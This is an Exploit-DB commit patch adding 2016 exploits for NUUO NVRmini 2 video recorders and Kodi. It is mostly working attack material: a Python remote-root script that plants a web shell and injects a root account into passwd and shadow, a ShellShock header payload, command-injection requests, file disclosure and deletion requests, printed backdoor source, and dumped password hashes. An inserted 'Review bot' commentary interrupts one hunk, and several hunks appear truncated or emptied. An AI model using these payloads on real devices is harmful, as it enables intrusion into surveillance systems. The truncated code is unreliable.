From e16112771185c129948c8bddbf65c2751eb1c63f Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 7 Aug 2016 05:06:35 +0000 Subject: [PATCH] DB: 2016-08-07 8 new exploits Kodi Web Server 16.1 - Denial of Service NUUO NVRmini 2 3.0.8 - Remote Root Exploit NUUO NVRmini 2 3.0.8 - (Add Admin) CSRF NUUO NVRmini 2 3.0.8 - Local File Disclosure NUUO NVRmini 2 3.0.8 - Multiple OS Command Injection NUUO NVRmini 2 3.0.8 - ShellShock Remote Code Execution NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion NUUO NVRmini 2 3.0.8 - (strong_user.php) Backdoor Remote Shell Access --- files.csv | 8 + platforms/cgi/webapps/40213.txt | 91 +++++++ platforms/php/webapps/40209.py | 163 +++++++++++++ platforms/php/webapps/40210.html | 66 ++++++ platforms/php/webapps/40211.txt | 154 ++++++++++++ platforms/php/webapps/40212.txt | 127 ++++++++++ platforms/php/webapps/40214.txt | 67 ++++++ platforms/php/webapps/40215.txt | 395 +++++++++++++++++++++++++++++++ platforms/windows/dos/40208.py | 54 +++++ 9 files changed, 1125 insertions(+) create mode 100755 platforms/cgi/webapps/40213.txt create mode 100755 platforms/php/webapps/40209.py create mode 100755 platforms/php/webapps/40210.html create mode 100755 platforms/php/webapps/40211.txt create mode 100755 platforms/php/webapps/40212.txt create mode 100755 platforms/php/webapps/40214.txt create mode 100755 platforms/php/webapps/40215.txt create mode 100755 platforms/windows/dos/40208.py diff --git a/files.csv b/files.csv index 2c2dab030..e34d6f354 100755 --- a/files.csv +++ b/files.csv 
@@ -36356,3 +36356,11 @@ id,file,description,date,author,platform,type,port
 40205,platforms/cgi/webapps/40205.txt,"Davolink DV-2051 - Multiple Vulnerabilities",2016-08-05,"Eric Flokstra",cgi,webapps,80
 40206,platforms/php/webapps/40206.txt,"WordPress Count per Day Plugin 3.5.4 - Stored Cross-Site Scripting",2016-08-05,"Julien Rentrop",php,webapps,80
 40207,platforms/hardware/webapps/40207.txt,"NASdeluxe NDL-2400r 2.01.09 - OS Command Injection",2016-08-05,"SySS GmbH",hardware,webapps,80
+40208,platforms/windows/dos/40208.py,"Kodi Web Server 16.1 - Denial of Service",2016-08-05,"Guillaume Kaddouch",windows,dos,8080
+40209,platforms/php/webapps/40209.py,"NUUO NVRmini 2 3.0.8 - Remote Root Exploit",2016-08-06,LiquidWorm,php,webapps,80
+40210,platforms/php/webapps/40210.html,"NUUO NVRmini 2 3.0.8 - (Add Admin) CSRF",2016-08-06,LiquidWorm,php,webapps,80
+40211,platforms/php/webapps/40211.txt,"NUUO NVRmini 2 3.0.8 - Local File Disclosure",2016-08-06,LiquidWorm,php,webapps,80
+40212,platforms/php/webapps/40212.txt,"NUUO NVRmini 2 3.0.8 - Multiple OS Command Injection",2016-08-06,LiquidWorm,php,webapps,80
+40213,platforms/cgi/webapps/40213.txt,"NUUO NVRmini 2 3.0.8 - ShellShock Remote Code Execution",2016-08-06,LiquidWorm,cgi,webapps,80
+40214,platforms/php/webapps/40214.txt,"NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion",2016-08-06,LiquidWorm,php,webapps,80
+40215,platforms/php/webapps/40215.txt,"NUUO NVRmini 2 3.0.8 - (strong_user.php) Backdoor Remote Shell Access",2016-08-06,LiquidWorm,php,webapps,80
diff --git a/platforms/cgi/webapps/40213.txt b/platforms/cgi/webapps/40213.txt
new file mode 100755
index 000000000..91ec6b7cb
--- /dev/null
+++ b/platforms/cgi/webapps/40213.txt
@@ -0,0 +1,91 @@ +NUUO NVRmini 2 NE-4160 ShellShock Remote Code Execution + + +Vendor: NUUO Inc. +Product web page: http://www.nuuo.com +Affected version: Firmware Version: 02.02.00 + NVR Version: 02.02.0000.0040 + Device Pack Version: 04.07.0000.0030 + + +Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS +functionality. Setup is simple and easy, with automatic port forwarding +settings built in. NVRmini 2 supports POS integration, making this the perfect +solution for small retail chain stores. NVRmini 2 also comes full equipped as +a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping +and RAID functions for data protection. Choose NVR and know that your valuable video +data is safe, always. + +Desc: NUUO NVRmini, NVRmini2, Crystal, NVRSolo suffers from authenticated ShellShock +vulnerability. This could allow an attacker to gain control over a targeted computer +if exploited successfully. The vulnerability affects Bash, a common component known +as a shell that appears in many versions of Linux and Unix. 
+ +Tested on: GNU/Linux 2.6.31.8 (armv5tel) + lighttpd/1.4.28 + PHP/5.5.3 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5352 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5352.php + + +14.01.2016 + +-- + + +POST /cgi-bin/cgi_system HTTP/1.1 +Host: 10.0.0.17 +Content-Length: 91 +Origin: http://10.0.0.17 +X-Requested-With: XMLHttpRequest +User-Agent: () { :;}; /bin/ls -al +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept: */* +Referer: http://10.0.0.17/protocol_ftp.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.8 +Cookie: PHPSESSID=3bc601000ea8f085c22cb37b9b102b7f; lang=en +Connection: close + +cmd=ftp_setup&act=modify&com_port=21&pasv_port_from=1024&pasv_port_to=65535&services=enable + + +Response: + +HTTP/1.1 200 OK +Connection: close +Date: Fri, 15 Jan 2016 13:09:11 GMT +Server: lighttpd/1.4.28 +Content-Length: 1652 + +drwxr-xr-x 3 root root 402 Oct 20 2014 . +drwxr-xr-x 6 root root 1024 Jan 4 22:49 .. 
+-rwxr-xr-x 1 root root 256564 Oct 20 2014 DaylightSavingWatcher +-rwxr-xr-x 1 root root 51376 Oct 20 2014 NuDatTool +-rwxr-xr-x 1 root root 60500 Oct 20 2014 NuDiscovery +-rwxr-xr-x 1 root root 930652 Oct 20 2014 NuHWMgn +-rwxr-xr-x 1 root root 8236 Oct 20 2014 NuNICWatcher +-rwxr-xr-x 1 root root 309 Oct 20 2014 after_mount.sh +lrwxrwxrwx 1 root root 7 Oct 20 2014 archive_mrg_mv -> lite_mv +-rwxr-xr-x 1 root root 1114844 Oct 20 2014 auto_upgrade +lrwxrwxrwx 1 root root 7 Oct 20 2014 cgi_main -> lite_mv +-rwxr-xr-x 1 root root 576992 Oct 20 2014 cgi_system +lrwxrwxrwx 1 root root 7 Oct 20 2014 ddns_update -> lite_mv +-rwxr-xr-x 1 root root 570 Oct 20 2014 getdhcpip.sh +-rwxr-xr-x 1 root root 388 Oct 20 2014 halt +drwxr-xr-x 2 root root 41 Oct 20 2014 lib +-rwxr-xr-x 1 root root 3827188 Oct 20 2014 lite_mv +-rwxr-xr-x 1 root root 15396 Oct 20 2014 nagent_mv +-rwxr-xr-x 1 root root 9836 Oct 20 2014 nu_btns +-rwxr-xr-x 1 root root 3496 Oct 20 2014 nudaemon +-rwxr-xr-x 1 root root 10616 Oct 20 2014 nufancontrol +-rwxr-xr-x 1 root root 12772 Oct 20 2014 nuklogd +-rwxr-xr-x 1 root root 392 Oct 20 2014 reboot +-rwxr-xr-x 1 root root 13144 Oct 20 2014 thwstat +FTP Setup OK diff --git a/platforms/php/webapps/40209.py b/platforms/php/webapps/40209.py new file mode 100755 index 000000000..34548f41c --- /dev/null +++ b/platforms/php/webapps/40209.py 
@@ -0,0 +1,163 @@
+#!/usr/bin/env python
+#
+#
+# NUUO Remote Root Exploit
+#
+#
+# Vendor: NUUO Inc.
+# Product web page: http://www.nuuo.com
+# Affected version: <=3.0.8
+#
+# Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
+# functionality. Setup is simple and easy, with automatic port forwarding
+# settings built in. NVRmini 2 supports POS integration, making this the perfect
+# solution for small retail chain stores. NVRmini 2 also comes full equipped as
+# a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
+# and RAID functions for data protection. Choose NVR and know that your valuable video
+# data is safe, always.
+#
+# Desc: NUUO NVRmini, NVRmini2, Crystal and NVRSolo suffers from an unauthenticated command
+# injection vulnerability. Due to an undocumented and hidden debugging script, an attacker
+# can inject and execute arbitrary code as the root user via the 'log' GET parameter in the
+# '__debugging_center_utils___.php' script.
+#
+# -----------------------------------------------------
+# $ nuuo.py 10.0.0.17 80
+# [*] ==============================================
+# [*] NUUO NVR/DVR/NDVR Remote Root Exploit
+# [*] Zero Science Lab - http://www.zeroscience.mk
+# [*] ==============================================
+# [*] Backdoor detected!
+# [*] Add root user (y/n)? n
+# [*] Press [ ENTER ] to start root shell...
+#
+# root@nuuo:~# id
+# uid=0(root) gid=0(root)
+#
+# root@nuuo:~# exit
+#
+# [*] Removing raidh.php file
+# [*] Session terminated!
+#
+# $
+# -----------------------------------------------------
+#
+# Tested on: GNU/Linux 3.0.8 (armv7l)
+# GNU/Linux 2.6.31.8 (armv5tel)
+# lighttpd/1.4.28
+# PHP/5.5.3
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# Zero Science Lab - http://www.zeroscience.mk
+#
+#
+# Advisory ID: ZSL-2016-5348
+# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5348.php
+# NSE Script: http://www.zeroscience.mk/codes/nuuo-backdoor.nse
+# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40209.zip
+#
+#
+# 14.01.2016
+#
+
+import os######
+import sys#####
+import time####
+import urllib##
+import binascii
+import requests
+
+__author__ = 'lqwrm'
+
+def persist(host,port,hexy,clean):
+
+ pwd = '''echo 'roOt:x:0:0:PWNED account:/:/bin/bash' >> /etc/passwd'''
+ sdw = '''echo 'roOt:$1$MJOnV/Y3$tDnMIBMy0lEQ2kDpfgTJP0:16914:0:99999:7:::' >> /etc/shadow'''
+ print '[*] Adding user \'roOt\' with password \'rewt\' in passwd file.'
+ requests.get('http://'+host+':'+port+'/raidh.php?cmd='+pwd)
+ time.sleep(2)
+
+ print '[*] Updating shadow file.'
+ requests.get('http://'+host+':'+port+'/raidh.php?cmd='+sdw)
+ time.sleep(2)
+
+ print '[*] Shell awaits: ssh roOt@'+host
+ requests.get('http://'+host+':'+port+'/raidh.php?cmd='+urllib.quote(clean))
+ exit(0)
+
+def check(host,port,hexy):
+
+ try:
+ r = requests.get('http://'+host+':'+port+'/'+hexy, allow_redirects=False)
+ if r.status_code == 200:
+ print '[*] Backdoor detected!'
+ pass
+ else:
+ print '[*] No backdoors here. :('
+ exit(0)
+ except Exception:
+ print '[*] Could not connect.'
+ exit(0)
+
+def main():
+
+ print '[*] =============================================='
+ print '[*] NUUO NVR/DVR/NDVR Remote Root Exploit'
+ print '[*] Zero Science Lab - http://www.zeroscience.mk'
+ print '[*] =============================================='
+
+ if (len(sys.argv) <= 2):
+ print '[*] Usage: nuuo.py '
+ exit(0)
+
+ host = sys.argv[1]
+ port = sys.argv[2]
+
+ dbgcu = '5f5f64'#
+ dbgcu+= '656275'#
+ dbgcu+= '676769'#
+ dbgcu+= '6e675f'#
+ dbgcu+= '63656e'#
+ dbgcu+= '746572'#
+ dbgcu+= '5f7574'#
+ dbgcu+= '696c73'#
+ dbgcu+= '5f5f5f'#
+ dbgcu+= '2e7068'#
+ dbgcu+= '70'###'#
+
+ hexy = binascii.unhexlify(dbgcu)
+ check (host,port,hexy)
+
+ payload = '''echo "" > raidh.php'''
+ requests.get('http://'+host+':'+port+'/'+hexy+'?log=1337;' + payload)
+
+ clean = 'rm raidh.php'
+ a1 = raw_input('[*] Add root user (y/n)? ')
+ if a1.strip() == 'y' or a1.strip() == 'Y':
+ persist (host,port,hexy,clean)
+ else:
+ pass
+
+ print '[*] Press [ ENTER ] to start root shell...'
+ raw_input()
+
+ while True:
+ try:
+ cmd = raw_input('root@nuuo:~# ')
+ if cmd.strip() == '':
+ print '[*] Give me a command!\n'
+ continue
+ else:
+ e = requests.get('http://'+host+':'+port+'/raidh.php?cmd='+urllib.quote(cmd))
+ print e.text
+ if cmd.strip() == 'exit':
+ print '[*] Removing raidh.php file'
+ requests.get('http://'+host+':'+port+'/raidh.php?cmd='+urllib.quote(clean))
+ print '[*] Session terminated!'
+ break
+ except Exception:
+ break
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/platforms/php/webapps/40210.html b/platforms/php/webapps/40210.html
new file mode 100755
index 000000000..f5c8d28f0
--- /dev/null
+++ b/platforms/php/webapps/40210.html
@@ -0,0 +1,66 @@
+
+
+
+
+
+
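Review bot: The request that removes `raidh.php` in main() is only sent when the operator types `exit`; the `except Exception: break` in the shell loop, a connection error, or a Ctrl-C at either raw_input() leaves the uploaded file on the device, so the PoC can leave an unauthenticated command-execution endpoint behind on an asset it was only meant to assess. Wrap the loop in `try:`/`finally:` so the `clean` request is always attempted, and have check() exit non-zero on its two failure paths instead of `exit(0)`, so a caller can tell "not affected" from "could not connect"; `os` and the `hexy` parameter of persist() are unused. The rendered hunk appears to have lost angle-bracketed text (the Usage line and the `payload` literal look truncated), so the file should be compared against the upstream copy before it is reviewed further. For responders, the artifacts this tool creates — `raidh.php` in the web root and a `roOt` entry in passwd/shadow — are the things to look for on a device suspected of having been hit.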
+ + + + + + + + + + + + + + + + + +
+ + diff --git a/platforms/php/webapps/40211.txt b/platforms/php/webapps/40211.txt new file mode 100755 index 000000000..c22e0c497 --- /dev/null +++ b/platforms/php/webapps/40211.txt @@ -0,0 +1,154 @@ +NUUO Local File Disclosure Vulnerability + + +Vendor: NUUO Inc. +Product web page: http://www.nuuo.com +Affected version: <=3.0.8 (NE-4160, NT-4040) + +Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS +functionality. Setup is simple and easy, with automatic port forwarding +settings built in. NVRmini 2 supports POS integration, making this the perfect +solution for small retail chain stores. NVRmini 2 also comes full equipped as +a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping +and RAID functions for data protection. Choose NVR and know that your valuable video +data is safe, always. + +Desc: NUUO NVRmini, NVRmini2, Crystal and NVRSolo suffers from a file disclosure +vulnerability when input passed thru the 'css' parameter to 'css_parser.php' script +is not properly verified before being used to include files. This can be exploited +to disclose contents of files from local resources. + + +Tested on: GNU/Linux 3.0.8 (armv7l) + GNU/Linux 2.6.31.8 (armv5tel) + lighttpd/1.4.28 + PHP/5.5.3 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5350 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5350.php + + +14.01.2016 + +-- + + +Request: +-------- +GET http://10.0.0.17/css_parser.php?css=__nvr_dat_tool___.php HTTP/1.1 + + +Response: +--------- + + + + + + DatTool + + +'; + echo 'alert("The system will start to repair videos right after system reboot. Please go to Setting Page to reboot system manually.")'; + echo ''; + touch(constant("FLASH_FOLDER")."/checkdat"); + } +?> + +

Click the Repair button to repair the recorded videos became black due to incorrect video format. It may take a long time to repair videos, which depends on the amount of video files.

+
+ + + + +
+ + +
+Usermame:
+Password:
+ +
+ + + + + + +============================================================================ + +Request: +-------- + +GET http://10.0.0.17/css_parser.php?css=css_parser.php HTTP/1.1 + + +Response: +--------- + +$value) +{ + //echo "Key: $key; Value: $value
\n "; + if ($key != 'css') + { + $file = str_replace($key,$value,$file); + } + //system("echo \"Key: $key; Value: $value
\n \" >> $filename"); +} + +echo $file; + +/* +foreach(array_reverse($matches[0]) as $match){ + $match=preg_replace('/\s+/',' ',rtrim(ltrim($match))); + $names[]=preg_replace('/\s.*//*','',$match); + $values[]=preg_replace('/^[^\s]*\s/','',$match); +} +*/ + +?> diff --git a/platforms/php/webapps/40212.txt b/platforms/php/webapps/40212.txt new file mode 100755 index 000000000..0d6de9fcb --- /dev/null +++ b/platforms/php/webapps/40212.txt 
@@ -0,0 +1,127 @@ +NUUO Multiple OS Command Injection Vulnerabilities + + +Vendor: NUUO Inc. +Product web page: http://www.nuuo.com +Affected version: <=3.0.8 (NE-4160, NT-4040, NT-4040(R)) + DP: <=04.07.0000.0030, <=04.03.0000.0035 + FW: <=02.02.00, <=1.7.0 + +Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS +functionality. Setup is simple and easy, with automatic port forwarding +settings built in. NVRmini 2 supports POS integration, making this the perfect +solution for small retail chain stores. NVRmini 2 also comes full equipped as +a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping +and RAID functions for data protection. Choose NVR and know that your valuable video +data is safe, always. + +NUUO Titan NVR is NUUO's Linux-based open platform recording solution. It is built +on Linux Foundation, with cross-platform Windows and MAC client software. It supports +up to 64 channels of megapixel recording with 250 Mbps throughput. It also comes with +a myriads of features that will sure to fulfill even the most demanding projects. Supports +over 2300 camera models from over 100 vendors. + +Desc: NUUO NVRmini, NVRmini2, Crystal, NVRSolo and NVRTitan suffers from multiple +authenticated OS command injection vulnerabilities. This can be exploited to inject +and execute arbitrary shell commands as the root user. 
+ +Tested on: GNU/Linux 3.0.8 (armv7l) + GNU/Linux 2.6.31.8 (armv5tel) + lighttpd/1.4.28 + lighttpd/1.4.35 + PHP/5.5.3 + PHP/5.6.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5351 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5351.php + + +14.01.2016 + +-- + + +NVRTitan: + +POST /handle_iscsi.php HTTP/1.1 +Host: 10.0.0.17 +Content-Length: x +Origin: http://10.0.0.17 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept: */* +Referer: http://10.0.0.17/iscsi.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.8 +Cookie: PHPSESSID=c9fdced9e8129eb4c14e3154cd0e0ce3; lang=en; loginName=admin +Connection: close + +act=discover&address=1.1.1.1|echo%20pwn&port=3260 + + + + +HTTP/1.1 200 OK +X-Powered-By: PHP/5.6.0 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-type: text/html; charset=UTF-8 +Connection: close +Date: Mon, 18 Apr 2016 08:52:17 GMT +Server: lighttpd/1.4.35 +Content-Length: x + +pwn + + +============================================================ + + +NVRmini/2/Solo/Crystal: + +GET /cgi-bin/cgi_system?cmd=raid_setup&act=getsmartinfo&devname=|ping%20-n%200%20localhost&rand=1452765315144 HTTP/1.1 +Host: 10.0.0.17 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36 +X-Requested-With: XMLHttpRequest +Accept: */* +Referer: http://10.0.0.17/raid.php +Accept-Encoding: gzip, deflate, sdch +Accept-Language: en-US,en;q=0.8 +Cookie: PHPSESSID=3bc601000ea8f085c22cb37b9b102b7f; lang=en +Connection: close + +--- + +POST /cgi-bin/cgi_system?cmd=saveconfig HTTP/1.1 +Host: 10.0.0.17 +Content-Length: 97 +Cache-Control: max-age=0 +Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Origin: http://10.0.0.17 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Referer: http://10.0.0.17/save_config.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.8 +Cookie: PHPSESSID=3bc601000ea8f085c22cb37b9b102b7f; lang=en +Connection: close + +bfolder=%2Fmtd%2Fblock3&bfile=|ping%20-n%200%20localhost&inc_emap=no&inc_pos=no + + +--- + +Sample session from commix: + +Shell > whoami +root +Shell > ls +Default.ini EMap PatrolOpt003.xml PatrolOpt009.xml PatrolOpt015.xml access apcupsd authority.lic auto_upgrade.ini autoarchive.ini camera.ini cameraparam.ini cmsserver.ini cmsstat daylightsaving.ini ddns.ini dualstreaming.ini email.ini eventaction.ini ezNUUO iobox.ini lenssetting.ini lighttpd-inc.conf lighttpd.conf liveserver.ini notice.ini nuservice.conf pos proftpd-inc.conf pushnotification raid_info.xml recordingmode.ini schedule.ini scheduler_dio.ini scheduler_motion.ini smb-inc.conf version.xml diff --git a/platforms/php/webapps/40214.txt b/platforms/php/webapps/40214.txt new file mode 100755 index 000000000..b3a24a9d8 --- /dev/null +++ b/platforms/php/webapps/40214.txt 
@@ -0,0 +1,67 @@ + +NUUO Arbitrary File Deletion Vulnerability + + +Vendor: NUUO Inc. +Product web page: http://www.nuuo.com +Affected version: <=3.0.8 + +Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS +functionality. Setup is simple and easy, with automatic port forwarding +settings built in. NVRmini 2 supports POS integration, making this the perfect +solution for small retail chain stores. NVRmini 2 also comes full equipped as +a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping +and RAID functions for data protection. Choose NVR and know that your valuable video +data is safe, always. + +Desc: Input passed to the 'filename' parameter in 'deletefile.php' is not properly +sanitised before being used to delete files. This can be exploited to delete files +with the permissions of the web server using their absolute path or via directory +traversal sequences passed within the affected POST/GET parameter. + +================================================================== +/deletefile.php: +---------------- + +1: + +================================================================== + +Tested on: GNU/Linux 3.0.8 (armv7l) + GNU/Linux 2.6.31.8 (armv5tel) + lighttpd/1.4.28 + PHP/5.5.3 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5353 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5353.php + + +14.01.2016 + +-- + + +POST /deletefile.php HTTP/1.1 +Host: 10.0.0.17 +Content-Length: x +Origin: http://10.0.0.17 +X-Requested-With: XMLHttpRequest +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.8 +Connection: close + +filename=He_molested_murdered_and_mutilated_her.mp4 + diff --git a/platforms/php/webapps/40215.txt b/platforms/php/webapps/40215.txt new file mode 100755 index 000000000..cec5886ea --- /dev/null +++ b/platforms/php/webapps/40215.txt 
@@ -0,0 +1,395 @@ + +NUUO Backdoor (strong_user.php) Remote Shell Access + + +Vendor: NUUO Inc. +Product web page: http://www.nuuo.com +Affected version: <=3.0.8 (NE-4160, NT-4040) + +Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS +functionality. Setup is simple and easy, with automatic port forwarding +settings built in. NVRmini 2 supports POS integration, making this the perfect +solution for small retail chain stores. NVRmini 2 also comes full equipped as +a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping +and RAID functions for data protection. Choose NVR and know that your valuable video +data is safe, always. + +Desc: NUUO NVRmini, NVRmini2, Crystal and NVRSolo devices have a hidden PHP script +that when called, a backdoor user is created with poweruser privileges that is able +to read and write files on the affected device. The backdoor user 'bbb' when created +with the password '111111' by visiting 'strong_user.php' script is able to initiate a +secure shell session and further steal and/or destroy sensitive information. + +================================================================== +/strong_user.php: +------------------------------- + +fileData = file($file); + $this->file = $file; + } + else + { + throw new Exception("Couldn’t open file."); + } + } catch (Exception $e) { + $this->error[] = $e->getMessage(); + } + } + + public function getAllHTML(){ + foreach ($this->fileData as $content) + { + $temp = explode(':', $content); + $output .= "Username: {$temp[0]}
"; + $output .= "Validation: {$temp[1]}
"; + $output .= "User Identifier: {$temp[2]}
"; + $output .= "Group Identifier: {$temp[3]}
"; + $output .= "Gecos Field: {$temp[4]}
"; + $output .= "Home Directory: {$temp[5]}
"; + $output .= "Shell: {$temp[6]}
"; + $output .= "
"; + } + return $output; + } + + public function getAllCLI() { + foreach ($this->fileData as $content) + { + $temp = explode(':', $content); + $output .= "Username: {$temp[0]} n"; + $output .= "Validation: {$temp[1]} n"; + $output .= "User Identifier: {$temp[2]} n"; + $output .= "Group Identifier: {$temp[3]} n"; + $output .= "Gecos Field: {$temp[4]} n"; + $output .= "Home Directory: {$temp[5]} n"; + $output .= "Shell: {$temp[6]} n"; + $output .= "n"; + } + return $output; + } + + public function searchUser($user,$data=0) { + try{ + $data = array(); + if (is_string($user)) + { + foreach($this->fileData as $line) + { + $temp = explode(':', $line); + if (in_array($user,$temp)) + { + if ($data) return 1; + $data['username'] = $temp[0]; + $data['validation'] = $temp[1]; + $data['user_identifier'] = $temp[2]; + $data['group_identifier'] = $temp[3]; + $data['gecos'] = $temp[4]; + $data['home_directory'] = $temp[5]; + $data['shell'] = $temp[6]; + } + + } + } + else + { + throw new Exception('A search error has occured.'); + } + } catch (Exception $e) { + $this->error[] = $e->getMessage(); + } + return $data; + } + + public function getError() { + return $this->error; + } + + public function deleteUser($user) { + try{ + if ($this->searchUser($user,1)) + { + foreach ($this->fileData as $line) + { + $lines = explode(":",$line); + if (!in_array($user,$lines)) + { + $final .= $line; + } + } + if(!file_put_contents($this->file,$final)) + { + throw new Exception("Could not delete user."); + } + } + else + { + throw new Exception("User doesn’t exist."); + } + } catch (Exception $e) { + echo $this->error[] = $e->getMessage(); + } + } +} + + + + + + + + + +/* + + echo "Strong test "; + + ma_getuser(); + ma_getgroup(); + + $result = array('users' => array(), 'groups' => array()); + + echo "
"; + echo $maUser; + echo "
"; + echo $maGroup; + echo "
"; + + foreach($maGroup as $key =>$value) + { + $tmp = array(); + $tmp['groupname'] = $maGroup[$key]->strGroupname; + $tmp['members'] = array(); + echo "Group (" . $key . ") === " . $maGroup[$key]->strGroupname; + echo "

"; + ma_getgroupmember($maGroup[$key]->strGroupname); + foreach ($maGroupmember as $mKey => $mValue) + { + echo " User ($mKey) ===> $mValue "; + echo "
"; + array_push($tmp['members'], $maGroupmember[$mKey]->strUsername); + } + //foreach($value as $userkey => $uservalue) + //{ + // echo " User ($userkey) ===> $uservalue "; + // echo "
"; + //} + echo "
"; + echo implode(",", $tmp['members']); + echo "
"; + $tmp['membersStr'] = implode(",", $tmp['members']); + array_push($result['groups'], $tmp); + } + + + echo "

Other

"; + $tmp = array(); + $tmp['groupname'] = 'admin'; + ma_getgroupmember($tmp['groupname']); + //ma_getgroupmember(''); + $tmp['members'] = array(); + foreach ($maGroupmember as $mKey => $mValue) + { + array_push($tmp['members'], $maGroupmember[$mKey]->strUsername); + echo $maGroupmember[$mKey]->strUsername . "
"; + } + $tmp['membersStr'] = implode(",", $tmp['members']); + array_push($result['groups'], $tmp); + + + echo "

USER

"; + + foreach ( $maUser as $key => $value) + { + $tmp = array(); + $tmp['username'] = $maUser[$key]->strUsername; + $tmp['groups'] = array(); + foreach ($result['groups'] as $gKey => $gValue) + { + if (in_array($tmp['username'], $gValue['members'])) + array_push($tmp['groups'], $gValue['groupname']); + } + $tmp['groupsStr'] = implode(",", $tmp['groups']); + echo $tmp['username'] . "
"; + echo $tmp['groupsStr'] . "
"; + array_push($result['users'], $tmp); + } +*/ + + echo "

Read Passwd

"; + + $passclass = new ReadPasswd('/etc/passwd'); + echo $passclass->getAllHTML(); + + echo "

add user

"; + //$output = system("adduser bbb -G poweruser -s /sbin/nologin -D -H; passwd bbb 111111"); + //$output = system("adduser bbb -G poweruser -s /sbin/nologin -D -H"); + $output = system("adduser bbb -G poweruser -D "); + + +/* + + $f = popen ("/usr/bin/passwd bbb","r"); + $read = fread($f, 1024); + $out = fwrite($f,"111111\n"); + echo $read . " read 111 ,,, $out
"; + $read = fread($f, 1024); + $out = fwrite($f,"111111\n"); + echo $read . " read 222 ,,, $out
"; + pclose($f); + //echo $output . " kkk
"; +*/ + $descriptorspec = array( + 0 => array("pipe", "r"), // stdin is a pipe that the child will read from + 1 => array("pipe", "w") // stdout is a pipe that the child will write to + ); + + $process = proc_open('/usr/bin/passwd bbb', $descriptorspec, $pipes); + if (is_resource($process)) + { + $read = fread($pipes[1], 1024); + $out = fwrite($pipes[0],"111111\n"); + echo $read . " read 111 ,,, $out
"; + $read = fread($pipes[1], 1024); + $out = fwrite($pipes[0],"111111\n"); + echo $read . " read 111 ,,, $out
"; + + fclose($pipes[0]); + fclose($pipes[1]); + } + proc_close($process); + + + + //$handle = popen("/bin/ls", "r"); + //$read = fread($handle, 1024); + //echo $read; + //pclose($handle); + +?> + +================================================================== + +Tested on: GNU/Linux 3.0.8 (armv7l) + GNU/Linux 2.6.31.8 (armv5tel) + lighttpd/1.4.28 + PHP/5.5.3 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5354 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5354.php + + +14.01.2016 + +-- + + +#1 +Read of /etc/shadow file before backdoor was enabled: +------------------------------------------------------ + +root@nuuo:~# cat /etc/shadow +#root:$1$1b0pmacH$sP7VdEAv01TvOk1JSl2L6/:14495:0:99999:7::: +root:$1$vd3TecoS$VyBh4/IsumZkqFU.1wfrV.:14461:0:99999:7::: +bin:*:14495:0:99999:7::: +daemon:*:14495:0:99999:7::: +adm:*:14495:0:99999:7::: +lp:*:14495:0:99999:7::: +sync:*:14495:0:99999:7::: +shutdown:*:14495:0:99999:7::: +halt:*:14495:0:99999:7::: +mail:*:14495:0:99999:7::: +uucp:*:14495:0:99999:7::: +operator:*:14495:0:99999:7::: +games:*:14495:0:99999:7::: +gopher:*:14495:0:99999:7::: +ftp:*:14495:0:99999:7::: +nobody:*:14495:0:99999:7::: +vcsa:!!:14564:::::: +sshd:!!:14564:::::: +guest::14564:0:99999:7::: + + +#2 +Issuing GET request to the script: +----------------------------------- + +GET http://10.0.0.17/strong_user.php HTTP/1.1 + + +#3 +Read of /etc/shadow 